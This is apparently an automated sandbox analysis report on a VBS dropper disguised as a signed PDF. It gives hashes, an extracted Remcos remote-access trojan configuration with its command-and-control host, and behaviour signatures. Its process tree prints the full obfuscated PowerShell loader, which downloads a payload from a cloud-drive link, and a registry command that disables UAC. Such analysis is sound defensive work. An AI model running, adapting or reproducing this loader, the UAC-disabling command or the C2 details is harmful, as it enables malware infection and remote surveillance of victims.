Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 09:16

General

  • Target

    30180908_signedpdf.vbs

  • Size

    33KB

  • MD5

    33788adfb67a0e0bf5a5fe58cb9c5617

  • SHA1

    a62c45afa541fdcccc5c97c432c78ce55b0a7a5b

  • SHA256

    609aaa35ee7b0582cb3e1e4e9f76d647c98377dac62eca602bf318578b61576f

  • SHA512

    9da759eba3eee9ed6d1b804ed8d26f1f59831d49543e393b6adf462343d98dbefabc0314c673b31a4c52857e0d975edbb8304c0e1ee7a375fd71f446ab655a50

  • SSDEEP

    768:WuEasaYzR+s1z3NkQpyhZ6d4nl3pVVCStrppuAP:zEasd+a3iQpy/V3/UStF3P

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30180908_signedpdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2424
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2144

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    b928f2cb9d443ba6195b254ef0daf96a

    SHA1

    397258f674df984cfee0434be39cfd4480c2b861

    SHA256

    a9d69fe9cf2936b8c3bfad0a3acbae4704b7c84b269a4c76100519b0dbeb9ac6

    SHA512

    fba8a429ae1719f5e830c9b84db114a6214dd9d1a4ca66a79cea451ef243c66ee45ba7facb27142ba8cdf539036c9c8eaaba18dc82d4cc4d007af3581dc54577

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8884feb849ae2af3e6a881ef6d4baf8d

    SHA1

    461a9a58dcc77d2c78ea2e1ff3847b6b8badc104

    SHA256

    4f2005cd637ed11408dbe2ed015de9a34555bb50325be4ea96d482d9f263676c

    SHA512

    7d6509df40171abd886789f4f4496620a448a90f78f4f45ec609289e4e630f62c4d33d4c4dabbc399ca7d3684cbd8cbb4635a7246d9ca4f289ba109a9fbb5ce0

  • C:\Users\Admin\AppData\Local\Temp\CabD867.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar5CB2.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4ZLX5NK0Q5WK1SMH6B9.temp

    Filesize

    7KB

    MD5

    d57596122db9f627577e929b5bce4dfe

    SHA1

    d7a213a9ec90d0648f0635d7a50ba22419957f65

    SHA256

    d7f36081d1275473d3ea09ea1611113b53b7085d6f76b879b1e64e0b5cad287c

    SHA512

    f65420ff0d2a04d96bb896661603c2341608ef9375dc0305c59f688ed174b6b8b874e220402f121cb4fd6eef2848b22e741be59d867791feb4e365ea11fb8f04

  • C:\Users\Admin\AppData\Roaming\Superspecialists.Won

    Filesize

    426KB

    MD5

    8a3cfa45f3daf3318ee35fbc24637ccd

    SHA1

    a4a2f7a664f7839ede5e3a38cd303c50ac4db90d

    SHA256

    13345dbc875ba768cb21aadf3b3127c0cd7b9278f1460f8bac7b2c382ac6bc6d

    SHA512

    a35d23894c58a3613fee2426974a2626ecdc410d254055a3a704f03ed54f64162bde5be672c4f706039f810e125610fb62ed941df6f4f4fa51ba9da12299e111

  • memory/1816-60-0x0000000000340000-0x00000000013A2000-memory.dmp

    Filesize

    16.4MB

  • memory/1816-59-0x0000000000340000-0x00000000013A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2424-26-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-29-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-30-0x000007FEF56EE000-0x000007FEF56EF000-memory.dmp

    Filesize

    4KB

  • memory/2424-32-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-27-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-24-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-25-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-23-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2424-22-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

  • memory/2424-21-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

  • memory/2424-20-0x000007FEF56EE000-0x000007FEF56EF000-memory.dmp

    Filesize

    4KB

  • memory/2560-36-0x0000000006800000-0x0000000009EB3000-memory.dmp

    Filesize

    54.7MB